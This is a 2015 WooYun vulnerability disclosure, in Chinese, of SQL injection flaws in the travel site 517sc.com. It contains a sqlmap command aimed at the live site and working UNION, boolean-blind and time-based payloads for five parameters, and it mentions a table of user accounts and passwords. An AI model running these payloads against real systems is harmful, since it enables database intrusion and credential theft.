当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-095440

漏洞标题:四川517旅行网主站众多SQL注入点

相关厂商:四川旅游网

漏洞作者: 大物期末不能挂

提交时间:2015-02-04 15:18

修复时间:2015-03-21 15:20

公开时间:2015-03-21 15:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-02-04: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-03-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

之前提交过一个注入点,后来又找了一遍,将所有的注入点都提交上来了。

详细说明:

之前找到的第一个注入点:

sqlmap.py -u "http://www.517sc.com:80/n/index.php?m=lists&a=index&day=7&max_day=0&typeId=3" --dbms "Mysql" --dbs


可利用数据库.png


一共33张表

表名.png


其中包括用户账户和密码

sc_member.png


之后又重新审视了全站,又找到如下注入点:

http://www.517sc.com/n/index.php?m=news&a=details&newsId=1332
newsId为注入点
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: newsId
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: m=news&a=details&newsId=1332) AND 9270=9270 AND (8831=8831
    Type: UNION query
    Title: MySQL UNION query (89) - 7 columns
    Payload: m=news&a=details&newsId=-3434) UNION ALL SELECT 89,89,89,CONCAT(0x71796d7371,0x6c547355546471577455,0x7172657071),89,89,89#
---


http://www.517sc.com/n/index.php?m=cms&a=index&cmsId=16
cmsId 为注入点
sqlmap identified the following injection points with a total of 364 HTTP(s) requests:
---
Place: GET
Parameter: cmsId
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: m=cms&a=index&cmsId=16) AND 2287=2287 AND (5874=5874
    Type: UNION query
    Title: MySQL UNION query (NULL) - 8 columns
    Payload: m=cms&a=index&cmsId=-1217) UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71796d7371,0x426c6f45456250497043,0x7172657071),NULL,NULL,NULL,NULL#
---


http://www.517sc.com/n/index.php?m=scenic&a=details&scenicId=184
scenicId为注入点
sqlmap identified the following injection points with a total of 362 HTTP(s) requests:
---
Place: GET
Parameter: scenicId
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: m=scenic&a=details&scenicId=184) AND 4973=4973 AND (5155=5155
    Type: UNION query
    Title: MySQL UNION query (NULL) - 6 columns
    Payload: m=scenic&a=details&scenicId=-5770) UNION ALL SELECT NULL,CONCAT(0x71796d7371,0x426f58594a78566c756a,0x7172657071),NULL,NULL,NULL,NULL#
---


http://www.517sc.com/n/index.php?m=hotel&a=details&hotelId=47
hotelId为注入点
sqlmap identified the following injection points with a total of 359 HTTP(s) requests:
---
Place: GET
Parameter: hotelId
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: m=hotel&a=details&hotelId=47) AND 4125=4125 AND (3254=3254
    Type: UNION query
    Title: MySQL UNION query (NULL) - 5 columns
    Payload: m=hotel&a=details&hotelId=47) UNION ALL SELECT NULL,NULL,CONCAT(0x71796d7371,0x4573456e457458484a5a,0x7172657071),NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: m=hotel&a=details&hotelId=47) AND SLEEP(5) AND (2723=2723
---


http://www.517sc.com/n/index.php?m=details&a=LineDetails&lineId=44
lineId
sqlmap identified the following injection points with a total of 357 HTTP(s) requests:
---
Place: GET
Parameter: lineId
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: m=details&a=LineDetails&lineId=44) AND 6162=6162 AND (5032=5032
    Type: UNION query
    Title: MySQL UNION query (NULL) - 7 columns
    Payload: m=details&a=LineDetails&lineId=44) UNION ALL SELECT CONCAT(0x71796d7371,0x63465959666451665047,0x7172657071),NULL,NULL,NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: m=details&a=LineDetails&lineId=44) AND SLEEP(5) AND (7030=7030
---

漏洞证明:

可利用数据库.png


一共33张表

表名.png


其中包括用户账户和密码

sc_member.png

修复方案:

过滤,很多参数都需要过滤

版权声明:转载请注明来源 大物期末不能挂@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝